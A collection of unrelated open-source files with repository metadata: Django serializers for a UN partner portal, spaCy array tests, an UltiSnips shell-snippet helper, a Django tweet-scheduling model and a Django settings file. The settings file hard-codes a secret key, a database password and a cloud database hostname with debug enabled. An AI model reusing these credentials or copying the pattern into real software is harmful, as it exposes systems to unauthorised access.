application_id = kwargs.get(self.context['view'].application_url_kwarg)
app = get_object_or_404(Application.objects.select_related('eoi'), pk=application_id)
if app.eoi.status != CFEI_STATUSES.closed:
raise serializers.ValidationError("Assessment allowed once deadline is passed.")
if data.get('is_a_committee_score', False) and app.eoi.reviewers.count() > 1:
raise serializers.ValidationError({
'is_a_committee_score': 'Committee scores are only allowed on projects with one reviewer.'
})
scores = data.get('scores')
        application = self.instance.application if self.instance else app
assessments_criteria = application.eoi.assessments_criteria
        if scores and {s['selection_criteria'] for s in scores} != {
            ac['selection_criteria'] for ac in assessments_criteria
        }:
raise serializers.ValidationError("You can score only selection criteria defined in CFEI.")
if scores and application.eoi.has_weighting:
for score in scores:
key = score.get('selection_criteria')
val = score.get('score')
criterion = list(filter(lambda x: x.get('selection_criteria') == key, assessments_criteria))
if len(criterion) == 1 and val > criterion[0].get('weight'):
raise serializers.ValidationError("The maximum score is equal to the value entered for the weight.")
elif len(criterion) != 1:
raise serializers.ValidationError("Selection criterion '{}' defined improper.".format(key))
return super(ReviewerAssessmentsSerializer, self).validate(data)
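# Illustrative sketch, not part of the original serializer: the two score checks
# performed in validate() above — every CFEI criterion must be scored, and with
# weighting enabled no score may exceed its criterion's weight. Inputs are plain
# dicts mirroring the `scores` and `assessments_criteria` shapes used above.
def _check_scores_example(scores, assessments_criteria, has_weighting):
    if {s['selection_criteria'] for s in scores} != {c['selection_criteria'] for c in assessments_criteria}:
        raise ValueError("You can score only selection criteria defined in CFEI.")
    if has_weighting:
        weights = {c['selection_criteria']: c['weight'] for c in assessments_criteria}
        for s in scores:
            if s['score'] > weights[s['selection_criteria']]:
                raise ValueError("The score cannot exceed the weight entered for this criterion.")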
class ApplicationPartnerOpenSerializer(serializers.ModelSerializer):
project_title = serializers.CharField(source="eoi.title")
project_displayID = serializers.CharField(source="eoi.displayID")
agency_name = serializers.CharField(source="agency.name")
country = serializers.SerializerMethodField()
specializations = serializers.SerializerMethodField()
application_date = serializers.CharField(source="created")
application_status_display = serializers.CharField(read_only=True)
class Meta:
model = Application
fields = (
'id',
'project_title',
'project_displayID',
'eoi_id',
'agency_name',
'country',
'specializations',
'application_date',
'application_status',
'application_status_display',
)
def get_country(self, obj):
return get_countries_code_from_queryset(obj.eoi.locations)
def get_specializations(self, obj):
return SimpleSpecializationSerializer(obj.eoi.specializations.all(), many=True).data
class ApplicationPartnerUnsolicitedDirectSerializer(serializers.ModelSerializer):
project_title = serializers.SerializerMethodField()
agency_name = serializers.CharField(source="agency.name")
country = serializers.SerializerMethodField()
specializations = serializers.SerializerMethodField()
submission_date = serializers.DateTimeField(source="published_timestamp")
is_direct = serializers.SerializerMethodField()
partner_name = serializers.CharField(source="partner.legal_name")
partner_additional = PartnerAdditionalSerializer(source="partner", read_only=True)
selected_source = serializers.CharField(source="eoi.selected_source", allow_null=True)
application_status_display = serializers.CharField(read_only=True)
class Meta:
model = Application
fields = (
'id',
'project_title',
'selected_source',
'eoi_id',
'agency_name',
'country',
'specializations',
'submission_date',
'status',
'is_direct',
'partner_name',
'partner_additional',
'application_status',
'application_status_display',
)
def get_project_title(self, obj):
return obj.proposal_of_eoi_details.get('title')
def get_country(self, obj):
if obj.eoi:
            # has been converted to a direct selection
country = obj.eoi.locations
else:
country = obj.locations_proposal_of_eoi
if country:
            # we expect a few countries here
return get_countries_code_from_queryset(country)
return None
    # TODO: make the field names here consistent with the application details serializer,
    # which nests these values under proposal_of_eoi_details
def get_specializations(self, obj):
return SimpleSpecializationSerializer(
Specialization.objects.filter(id__in=obj.proposal_of_eoi_details.get('specializations')), many=True).data
def get_is_direct(self, obj):
return obj.eoi_converted is not None
class ApplicationPartnerDirectSerializer(ApplicationPartnerUnsolicitedDirectSerializer):
project_title = serializers.CharField(source="eoi.title")
specializations = serializers.SerializerMethodField()
def get_specializations(self, obj):
return SimpleSpecializationSerializer(obj.eoi.specializations.all(), many=True).data
class AgencyUnsolicitedApplicationSerializer(ApplicationPartnerUnsolicitedDirectSerializer):
has_yellow_flag = serializers.BooleanField(source="partner.has_yellow_flag")
has_red_flag = serializers.BooleanField(source="partner.has_red_flag")
is_ds_converted = serializers.SerializerMethodField()
class Meta:
model = Application
fields = ApplicationPartnerUnsolicitedDirectSerializer.Meta.fields + (
'has_red_flag',
'has_yellow_flag',
'partner_is_verified',
'is_ds_converted',
)
def get_is_ds_converted(self, obj):
return obj.eoi_converted is not None
class ApplicationFeedbackSerializer(serializers.ModelSerializer):
provider = AgencyUserListSerializer(read_only=True)
class Meta:
model = ApplicationFeedback
fields = ('id', 'feedback', 'provider', 'created')
class ConvertUnsolicitedSerializer(serializers.Serializer):
RESTRICTION_MSG = 'Unsolicited concept note already converted to a direct selection project.'
ds_justification_select = serializers.ListField()
justification = serializers.CharField(source="eoi.justification")
focal_points = IDUserSerializer(many=True, source="eoi.focal_points", read_only=True)
description = serializers.CharField(source="eoi.description")
other_information = serializers.CharField(
source="eoi.other_information", required=False, allow_blank=True, allow_null=True)
start_date = serializers.DateField(source="eoi.start_date")
end_date = serializers.DateField(source="eoi.end_date")
class Meta:
model = Application
def validate(self, data):
id = self.context['request'].parser_context.get('kwargs', {}).get('pk')
if Application.objects.get(id=id).eoi_converted is not None:
raise serializers.ValidationError(self.RESTRICTION_MSG)
return super(ConvertUnsolicitedSerializer, self).validate(data)
@transaction.atomic
def create(self, validated_data):
ds_justification_select = validated_data.pop('ds_justification_select')
focal_points = self.initial_data.get('focal_points', [])
submitter = self.context['request'].user
app_id = self.context['request'].parser_context['kwargs']['pk']
application: Application = get_object_or_404(
Application,
id=app_id,
is_unsolicited=True,
eoi_converted__isnull=True
)
if not application.locations_proposal_of_eoi.first():
raise serializers.ValidationError('Invalid application, no locations specified.')
eoi: EOI = EOI(**validated_data['eoi'])
eoi.displayID = get_eoi_display_identifier(
application.agency.name, application.locations_proposal_of_eoi.first().admin_level_1.country_code
)
eoi.created_by = submitter
eoi.display_type = CFEI_TYPES.direct
eoi.title = application.proposal_of_eoi_details.get('title')
eoi.agency = application.agency
        # we can use .get() directly because an agency member belongs to exactly one agency office
eoi.agency_office = submitter.agency_members.get().office
eoi.selected_source = DIRECT_SELECTION_SOURCE.ucn
eoi.is_published = True
eoi.save()
for specialization in application.proposal_of_eoi_details.get('specializations', []):
eoi.specializations.add(specialization)
for location in application.locations_proposal_of_eoi.all():
eoi.locations.add(location)
application.ds_justification_select = ds_justification_select
application.eoi_converted = eoi
application.save()
ds_app = Application.objects.create(
partner=application.partner,
eoi=eoi,
agency=eoi.agency,
submitter=application.submitter,
status=APPLICATION_STATUSES.pending,
did_win=True,
did_accept=False,
ds_justification_select=ds_justification_select,
justification_reason=application.justification_reason
)
update_cfei_focal_points(eoi, focal_points)
return ds_app
class ReviewSummarySerializer(MixinPreventManyCommonFile, serializers.ModelSerializer):
review_summary_attachment = CommonFileSerializer(required=False, allow_null=True)
class Meta:
model = EOI
fields = (
'review_summary_comment',
'review_summary_attachment',
)
prevent_keys = ['review_summary_attachment']
def update(self, instance, validated_data):
self.prevent_many_common_file_validator(self.initial_data)
return super(ReviewSummarySerializer, self).update(instance, validated_data)
class EOIReviewersAssessmentsSerializer(serializers.ModelSerializer):
user_id = serializers.CharField(source='id')
user_name = serializers.CharField(source='get_fullname')
assessments = serializers.SerializerMethodField()
class Meta:
model = User
fields = (
'user_id',
'user_name',
'assessments',
)
def get_assessments(self, user):
lookup_field = self.context['view'].lookup_field
eoi_id = self.context['request'].parser_context['kwargs'][lookup_field]
eoi = get_object_or_404(EOI, id=eoi_id)
applications = eoi.applications.filter(status__in=[
APPLICATION_STATUSES.preselected, APPLICATION_STATUSES.recommended,
])
applications_count = applications.count()
assessments_count = Assessment.objects.filter(reviewer=user, application__in=applications).count()
reminder_sent_recently = user_received_notification_recently(user, eoi, NotificationType.CFEI_REVIEW_REQUIRED)
return {
'counts': "{}/{}".format(assessments_count, applications_count),
            'send_reminder': assessments_count != applications_count and not reminder_sent_recently,
            'eoi_id': eoi_id,  # useful for the front-end to construct the send-reminder URL more easily
}
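# Illustrative sketch, not part of the original serializer: how the per-reviewer
# progress payload above is assembled. Plain integers stand in for the ORM
# .count() calls; the argument names are hypothetical.
def _reviewer_progress_example(assessments_count, applications_count, reminder_sent_recently, eoi_id):
    return {
        'counts': "{}/{}".format(assessments_count, applications_count),
        'send_reminder': assessments_count != applications_count and not reminder_sent_recently,
        'eoi_id': eoi_id,
    }
# _reviewer_progress_example(2, 5, False, 17) ==
#     {'counts': '2/5', 'send_reminder': True, 'eoi_id': 17}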
class AwardedPartnersSerializer(serializers.ModelSerializer):
partner_id = serializers.CharField(source='partner.id')
partner_name = serializers.CharField(source='partner.legal_name')
partner_additional = PartnerAdditionalSerializer(source="partner", read_only=True)
application_id = serializers.CharField(source='id')
cn = CommonFileSerializer()
partner_notified = serializers.SerializerMethodField()
agency_decision_maker = BasicUserSerializer(read_only=True)
partner_decision_maker = BasicUserSerializer(read_only=True)
body = serializers.SerializerMethodField()
class Meta:
model = Application
fields = (
'partner_id',
'partner_name',
'partner_additional',
'application_id',
'did_win',
'did_withdraw',
'withdraw_reason',
'did_decline',
'did_accept',
'cn',
'partner_notified',
'agency_decision_date',
'agency_decision_maker',
'partner_decision_date',
'partner_decision_maker',
'body',
)
def get_body(self, obj):
assessments_count = obj.assessments.count()
assessments = obj.assessments.all()
notes = []
for assessment in assessments:
notes.append({
'note': assessment.note,
'reviewer': assessment.reviewer.get_fullname(),
})
return {
'criteria': obj.get_scores_by_selection_criteria(),
'notes': notes,
'avg_total_score': obj.average_total_score,
'assessment_count': assessments_count,
}
def get_partner_notified(self, obj):
return obj.accept_notification and obj.accept_notification.created
class CompareSelectedSerializer(serializers.ModelSerializer):
partner_id = serializers.IntegerField(source='partner.id')
partner_name = serializers.CharField(source='partner.legal_name')
partner_additional = PartnerAdditionalSerializer(source="partner", read_only=True)
year_establishment = serializers.IntegerField(source='partner.profile.year_establishment')
total_assessment_score = serializers.IntegerField(source='average_total_score')
verification_status = serializers.BooleanField(source="partner.is_verified")
flagging_status = serializers.JSONField(source="partner.flagging_status")
annual_budget = serializers.SerializerMethodField()
un_exp = serializers.SerializerMethodField()
class Meta:
model = Application
fields = (
'partner_id',
'partner_name',
'partner_additional',
'year_establishment',
'eoi_id',
'total_assessment_score',
'verification_status',
'flagging_status',
'un_exp',
'annual_budget',
'did_win',
'did_withdraw',
'assessments_is_completed',
'assessments_marked_as_completed',
)
def get_annual_budget(self, obj):
return obj.partner.profile.annual_budget
def get_un_exp(self, obj):
return ", ".join(obj.partner.collaborations_partnership.all().values_list('agency__name', flat=True))
class SubmittedCNSerializer(serializers.ModelSerializer):
cn_id = serializers.IntegerField(source='id')
agency_name = serializers.CharField(source="agency.name")
specializations = serializers.SerializerMethodField()
application_status_display = serializers.CharField(read_only=True)
class Meta:
model = Application
fields = (
'cn_id',
'project_title',
'cfei_type',
'agency_name',
'countries',
'specializations',
'application_status',
'application_status_display',
'eoi_id'
)
def get_specializations(self, obj):
if obj.is_unsolicited:
queryset = Specialization.objects.filter(id__in=obj.proposal_of_eoi_details.get('specializations'))
else:
queryset = obj.eoi.specializations.all()
return SimpleSpecializationSerializer(queryset, many=True).data
class PendingOffersSerializer(SubmittedCNSerializer):
class Meta:
model = Application
fields = (
'cn_id',
'project_title',
'cfei_type',
'agency_name',
'countries',
'specializations',
'eoi_id'
)
class ClarificationRequestQuestionSerializer(serializers.ModelSerializer):
created_by = BasicUserSerializer(read_only=True)
partner = PartnerSimpleSerializer(read_only=True)
class Meta:
model = ClarificationRequestQuestion
fields = (
'id',
'created',
'created_by',
'partner',
'question',
)
read_only_fields = (
'created',
)
class ClarificationRequestAnswerFileSerializer(serializers.ModelSerializer):
created_by = serializers.HiddenField(default=serializers.CreateOnlyDefault(CurrentUserDefault()))
file = CommonFileSerializer()
class Meta:
model = ClarificationRequestAnswerFile
fields = (
'id',
'created_by',
'title',
'file',
)
|
{
"content_hash": "dba5710a8e0a653784a7aae861e7cbfc",
"timestamp": "",
"source": "github",
"line_count": 1469,
"max_line_length": 120,
"avg_line_length": 37.09938733832539,
"alnum_prop": 0.6303968880162939,
"repo_name": "unicef/un-partner-portal",
"id": "7d4745a95846323772c86a0230b04427f770c7a4",
"size": "54523",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "backend/unpp_api/apps/project/serializers.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "468629"
},
{
"name": "Dockerfile",
"bytes": "2303"
},
{
"name": "HTML",
"bytes": "49027"
},
{
"name": "JavaScript",
"bytes": "2199879"
},
{
"name": "Python",
"bytes": "1322681"
},
{
"name": "Shell",
"bytes": "4734"
},
{
"name": "Smarty",
"bytes": "751"
}
],
"symlink_target": ""
}
|
import numpy
import pytest
from spacy.tokens import Doc
from spacy.attrs import ORTH, SHAPE, POS, DEP, MORPH
@pytest.mark.issue(2203)
def test_issue2203(en_vocab):
"""Test that lemmas are set correctly in doc.from_array."""
words = ["I", "'ll", "survive"]
tags = ["PRP", "MD", "VB"]
lemmas = ["-PRON-", "will", "survive"]
tag_ids = [en_vocab.strings.add(tag) for tag in tags]
lemma_ids = [en_vocab.strings.add(lemma) for lemma in lemmas]
doc = Doc(en_vocab, words=words)
# Work around lemma corruption problem and set lemmas after tags
doc.from_array("TAG", numpy.array(tag_ids, dtype="uint64"))
doc.from_array("LEMMA", numpy.array(lemma_ids, dtype="uint64"))
assert [t.tag_ for t in doc] == tags
assert [t.lemma_ for t in doc] == lemmas
# We need to serialize both tag and lemma, since this is what causes the bug
doc_array = doc.to_array(["TAG", "LEMMA"])
new_doc = Doc(doc.vocab, words=words).from_array(["TAG", "LEMMA"], doc_array)
assert [t.tag_ for t in new_doc] == tags
assert [t.lemma_ for t in new_doc] == lemmas
def test_doc_array_attr_of_token(en_vocab):
doc = Doc(en_vocab, words=["An", "example", "sentence"])
example = doc.vocab["example"]
assert example.orth != example.shape
feats_array = doc.to_array((ORTH, SHAPE))
    assert feats_array[0][0] != feats_array[0][1]
def test_doc_stringy_array_attr_of_token(en_vocab):
doc = Doc(en_vocab, words=["An", "example", "sentence"])
example = doc.vocab["example"]
assert example.orth != example.shape
feats_array = doc.to_array((ORTH, SHAPE))
feats_array_stringy = doc.to_array(("ORTH", "SHAPE"))
assert feats_array_stringy[0][0] == feats_array[0][0]
assert feats_array_stringy[0][1] == feats_array[0][1]
def test_doc_scalar_attr_of_token(en_vocab):
doc = Doc(en_vocab, words=["An", "example", "sentence"])
example = doc.vocab["example"]
assert example.orth != example.shape
feats_array = doc.to_array(ORTH)
assert feats_array.shape == (3,)
def test_doc_array_tag(en_vocab):
words = ["A", "nice", "sentence", "."]
pos = ["DET", "ADJ", "NOUN", "PUNCT"]
doc = Doc(en_vocab, words=words, pos=pos)
assert doc[0].pos != doc[1].pos != doc[2].pos != doc[3].pos
feats_array = doc.to_array((ORTH, POS))
assert feats_array[0][1] == doc[0].pos
assert feats_array[1][1] == doc[1].pos
assert feats_array[2][1] == doc[2].pos
assert feats_array[3][1] == doc[3].pos
def test_doc_array_morph(en_vocab):
words = ["Eat", "blue", "ham"]
morph = ["Feat=V", "Feat=J", "Feat=N"]
doc = Doc(en_vocab, words=words, morphs=morph)
assert morph[0] == str(doc[0].morph)
assert morph[1] == str(doc[1].morph)
assert morph[2] == str(doc[2].morph)
feats_array = doc.to_array((ORTH, MORPH))
assert feats_array[0][1] == doc[0].morph.key
assert feats_array[1][1] == doc[1].morph.key
assert feats_array[2][1] == doc[2].morph.key
def test_doc_array_dep(en_vocab):
words = ["A", "nice", "sentence", "."]
deps = ["det", "amod", "ROOT", "punct"]
doc = Doc(en_vocab, words=words, deps=deps)
feats_array = doc.to_array((ORTH, DEP))
assert feats_array[0][1] == doc[0].dep
assert feats_array[1][1] == doc[1].dep
assert feats_array[2][1] == doc[2].dep
assert feats_array[3][1] == doc[3].dep
@pytest.mark.parametrize("attrs", [["ORTH", "SHAPE"], "IS_ALPHA"])
def test_doc_array_to_from_string_attrs(en_vocab, attrs):
"""Test that both Doc.to_array and Doc.from_array accept string attrs,
as well as single attrs and sequences of attrs.
"""
words = ["An", "example", "sentence"]
doc = Doc(en_vocab, words=words)
Doc(en_vocab, words=words).from_array(attrs, doc.to_array(attrs))
def test_doc_array_idx(en_vocab):
"""Test that Doc.to_array can retrieve token start indices"""
words = ["An", "example", "sentence"]
offsets = Doc(en_vocab, words=words).to_array("IDX")
assert offsets[0] == 0
assert offsets[1] == 3
assert offsets[2] == 11
def test_doc_from_array_heads_in_bounds(en_vocab):
"""Test that Doc.from_array doesn't set heads that are out of bounds."""
words = ["This", "is", "a", "sentence", "."]
doc = Doc(en_vocab, words=words)
for token in doc:
token.head = doc[0]
# correct
arr = doc.to_array(["HEAD"])
doc_from_array = Doc(en_vocab, words=words)
doc_from_array.from_array(["HEAD"], arr)
# head before start
arr = doc.to_array(["HEAD"])
arr[0] = -1
doc_from_array = Doc(en_vocab, words=words)
with pytest.raises(ValueError):
doc_from_array.from_array(["HEAD"], arr)
# head after end
arr = doc.to_array(["HEAD"])
arr[0] = 5
doc_from_array = Doc(en_vocab, words=words)
with pytest.raises(ValueError):
doc_from_array.from_array(["HEAD"], arr)
|
{
"content_hash": "cfbe52f8bdec037047f88f9b7815b43a",
"timestamp": "",
"source": "github",
"line_count": 136,
"max_line_length": 81,
"avg_line_length": 36.1764705882353,
"alnum_prop": 0.6184959349593496,
"repo_name": "explosion/spaCy",
"id": "c334cc6ebc41999735550b7250b1399f80407295",
"size": "4920",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "spacy/tests/doc/test_array.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "9571"
},
{
"name": "C++",
"bytes": "187"
},
{
"name": "Cython",
"bytes": "784034"
},
{
"name": "Dockerfile",
"bytes": "432"
},
{
"name": "HTML",
"bytes": "29880"
},
{
"name": "JavaScript",
"bytes": "240056"
},
{
"name": "Jinja",
"bytes": "12977"
},
{
"name": "Makefile",
"bytes": "1576"
},
{
"name": "Python",
"bytes": "3783857"
},
{
"name": "Sass",
"bytes": "56930"
},
{
"name": "Shell",
"bytes": "984"
}
],
"symlink_target": ""
}
|
"""Implements `echo hi` shell code interpolation."""
import os
import platform
from subprocess import Popen, PIPE
import stat
import tempfile
from UltiSnips.compatibility import as_unicode
from UltiSnips.text_objects._base import NoneditableTextObject
def _chomp(string):
"""Rather than rstrip(), remove only the last newline and preserve
purposeful whitespace."""
if len(string) and string[-1] == '\n':
string = string[:-1]
if len(string) and string[-1] == '\r':
string = string[:-1]
return string
def _run_shell_command(cmd, tmpdir):
"""Write the code to a temporary file"""
cmdsuf = ''
if platform.system() == 'Windows':
# suffix required to run command on windows
cmdsuf = '.bat'
# turn echo off
cmd = '@echo off\r\n' + cmd
handle, path = tempfile.mkstemp(text=True, dir=tmpdir, suffix=cmdsuf)
os.write(handle, cmd.encode("utf-8"))
os.close(handle)
os.chmod(path, stat.S_IRWXU)
# Execute the file and read stdout
proc = Popen(path, shell=True, stdout=PIPE, stderr=PIPE)
proc.wait()
stdout, _ = proc.communicate()
os.unlink(path)
return _chomp(as_unicode(stdout))
def _get_tmp():
"""Find an executable tmp directory."""
userdir = os.path.expanduser("~")
for testdir in [tempfile.gettempdir(), os.path.join(userdir, '.cache'),
os.path.join(userdir, '.tmp'), userdir]:
if (not os.path.exists(testdir) or
not _run_shell_command('echo success', testdir) == 'success'):
continue
return testdir
return ''
class ShellCode(NoneditableTextObject):
"""See module docstring."""
def __init__(self, parent, token):
NoneditableTextObject.__init__(self, parent, token)
self._code = token.code.replace("\\`", "`")
self._tmpdir = _get_tmp()
def _update(self, done):
if not self._tmpdir:
output = \
"Unable to find executable tmp directory, check noexec on /tmp"
else:
output = _run_shell_command(self._code, self._tmpdir)
self.overwrite(output)
self._parent._del_child(self) # pylint:disable=protected-access
return True
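# Illustrative sketch, not part of the original module: exercising the helpers
# above directly — locate a usable temp directory and run a one-line command.
if __name__ == "__main__":
    tmpdir = _get_tmp()
    if tmpdir:
        print(_run_shell_command("echo hi", tmpdir))  # expected output: hi
    else:
        print("No executable tmp directory found.")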
|
{
"content_hash": "7b1a5f72d3523a14cffc478aa8a23a79",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 79,
"avg_line_length": 32.720588235294116,
"alnum_prop": 0.6202247191011236,
"repo_name": "marshnmedia/dotfiles",
"id": "3e9099a6fb7c980581dc6fbbcfae875c148a0ef9",
"size": "2266",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": ".vim/bundle/ultisnips.vim/pythonx/UltiSnips/text_objects/_shell_code.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "308"
},
{
"name": "Python",
"bytes": "281550"
},
{
"name": "Ruby",
"bytes": "3120"
},
{
"name": "Shell",
"bytes": "16113"
},
{
"name": "Vim script",
"bytes": "985488"
}
],
"symlink_target": ""
}
|
from django.db import models
from django.template.defaultfilters import truncatechars
from django.utils import timezone
from sked.models import Event, Session
from twit.threads import SendTweetThread
class TweetTooLongError(Exception):
def __init__(self, msg=None):
self.msg = msg
if not self.msg:
self.msg = 'Adding this session would result in a tweet longer than 140 characters.'
class AlreadyAssignedError(Exception):
def __init__(self, msg=None):
self.msg = msg
if not self.msg:
self.msg = 'This session already belongs to a tweet in this sequence.'
class Tweet(models.Model):
sent_at = models.DateTimeField(blank=True, null=True)
class Meta:
abstract = True
def send(self):
        """Send this tweet and the rest of its series. This can only be called
        from the first tweet in a series, raising NotImplementedError if called
        on a non-initial tweet. It spins off a thread to make the actual API
        calls, which manages state within the series.
        """
if self.previous:
raise NotImplementedError('Serial tweets can only be sent from the beginning.')
SendTweetThread(self).start()
@property
def is_sent(self):
return self.sent_at is not None
class SessionBlockTweetManager(models.Manager):
def unsent(qs):
return qs.filter(sent_at=None, previous=None)
class SessionBlockTweet(Tweet):
timeslot = models.DateTimeField()
event = models.ForeignKey(Event, related_name="session_tweets")
session_ids = models.CommaSeparatedIntegerField(max_length=128,
blank=True, default="")
previous = models.OneToOneField('SessionBlockTweet', blank=True,
null=True, unique=True, related_name="next")
objects = SessionBlockTweetManager()
class Meta:
ordering = ('-timeslot', 'id')
def __unicode__(self):
try:
return 'Tweet %s of %s for %s at %s' % (
self.index + 1, self.total, self.timeslot, self.event)
        except Exception:
return 'Tweet for %s at %s' % (self.timeslot, self.event)
def touch(self):
self._seq = None
self._sessions = None
def get_sequence(self):
try:
if self._seq is not None:
return self._seq
except AttributeError:
pass
seq = []
cursor = self
while cursor.previous:
cursor = cursor.previous
seq.append(cursor)
while True:
try:
cursor = cursor.next
seq.append(cursor)
except SessionBlockTweet.DoesNotExist:
break
self._seq = seq
return self.get_sequence()
def first_in_sequence(self):
seq = self.get_sequence()
return seq[0]
def get_session_ids(self):
try:
return [int(id) for id in self.session_ids.split(',')]
        except Exception:
return []
def add_session(self, session):
if self.length < 140:
assigned = [id for tweet in self.get_sequence() for id in tweet.get_session_ids()]
if session.id in assigned:
raise AlreadyAssignedError()
locally_assigned = self.get_session_ids()
locally_assigned.append(session.id)
self.session_ids = ','.join([str(id) for id in locally_assigned])
self.touch()
if self.length > 140:
if self.sessions.count() > 1:
self.remove_session(session)
raise TweetTooLongError()
else:
raise TweetTooLongError()
def remove_session(self, session):
self.session_ids = ','.join([str(id) for
id in self.get_session_ids() if
id != session.id])
self.touch()
@property
def sessions(self):
try:
if self._sessions is not None:
return self._sessions
except AttributeError:
pass
try:
self._sessions = Session.objects.filter(id__in=self.get_session_ids())
except ValueError:
self._sessions = Session.objects.none()
return self.sessions
@property
def index(self):
seq = self.get_sequence()
return seq.index(self)
@property
def is_first(self):
return self.previous is None
@property
def is_last(self):
try:
return self.next is None
except SessionBlockTweet.DoesNotExist:
return True
@property
def total(self):
seq = self.get_sequence()
return len(seq)
@property
def text(self):
txt = u''
if self.is_first:
txt += u'Coming up at %s: ' % (self.timeslot
.astimezone(timezone.get_current_timezone())
.strftime('%-I:%M'))
        txt += u', '.join([
            '%s (%s)' % (
                truncatechars(s.title, 120) if self.sessions.count() == 1 else s.title,
                s.location.name,
            )
            for s in self.sessions
        ])
return txt
@property
def length(self):
return len(self.text)
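# Illustrative sketch, not part of the original module: the greedy 140-character
# packing that add_session()/TweetTooLongError enforce, shown on plain title
# strings instead of Session objects. Function and variable names are hypothetical.
def _pack_titles_example(titles, limit=140):
    tweets, current = [], []
    for title in titles:
        candidate = current + [title]
        if current and len(u', '.join(candidate)) > limit:
            tweets.append(u', '.join(current))
            current = [title]
        else:
            current = candidate
    if current:
        tweets.append(u', '.join(current))
    return tweets
# _pack_titles_example(["Opening keynote (Main Hall)", "Data for good (Room 2)"]) ==
#     ["Opening keynote (Main Hall), Data for good (Room 2)"]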
|
{
"content_hash": "cd3df1f2f48b6890e15789b8753ab649",
"timestamp": "",
"source": "github",
"line_count": 176,
"max_line_length": 96,
"avg_line_length": 30.84659090909091,
"alnum_prop": 0.5479830539694235,
"repo_name": "sunlightlabs/tcamp",
"id": "a371326020796149585a967836fda99a61f30ba8",
"size": "5429",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tcamp/twit/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "191488"
},
{
"name": "HTML",
"bytes": "832187"
},
{
"name": "JavaScript",
"bytes": "86789"
},
{
"name": "Python",
"bytes": "703083"
},
{
"name": "Shell",
"bytes": "623"
}
],
"symlink_target": ""
}
|
"""
Django settings for campaignserver project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'k-(62ls@8owkmo72ipb_x-#9zgt#!59+8^5kw(rf3yatpmou%h'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'dataserver',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'campaignserver.urls'
WSGI_APPLICATION = 'campaignserver.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'followthemoney',
'USER': 'root',
'PASSWORD': 'followthemoney',
'HOST': 'followthemoney.chwj19dbxodd.us-east-1.rds.amazonaws.com',
'PORT': '3306',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
STATIC_URL = '/static/'
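# Illustrative sketch, not part of the original settings: the same DATABASES block
# with credentials read from environment variables instead of being hard-coded.
# The variable names (DB_NAME, DB_USER, ...) are hypothetical; the block is left
# commented out so the settings above remain authoritative.
# DATABASES = {
#     'default': {
#         'ENGINE': 'django.db.backends.mysql',
#         'NAME': os.environ.get('DB_NAME', 'followthemoney'),
#         'USER': os.environ.get('DB_USER', 'root'),
#         'PASSWORD': os.environ.get('DB_PASSWORD', ''),
#         'HOST': os.environ.get('DB_HOST', ''),
#         'PORT': os.environ.get('DB_PORT', '3306'),
#     }
# }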
|
{
"content_hash": "42154eb4dbf891ebebaf42a74f35de2b",
"timestamp": "",
"source": "github",
"line_count": 97,
"max_line_length": 74,
"avg_line_length": 26.010309278350515,
"alnum_prop": 0.7225525168450257,
"repo_name": "follownjmoney/campaign-server",
"id": "3be0863eff355be0aff2320b7a43eb0609c75255",
"size": "2523",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "campaignserver/campaignserver/settings_prod.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1374"
},
{
"name": "Python",
"bytes": "12979"
}
],
"symlink_target": ""
}
|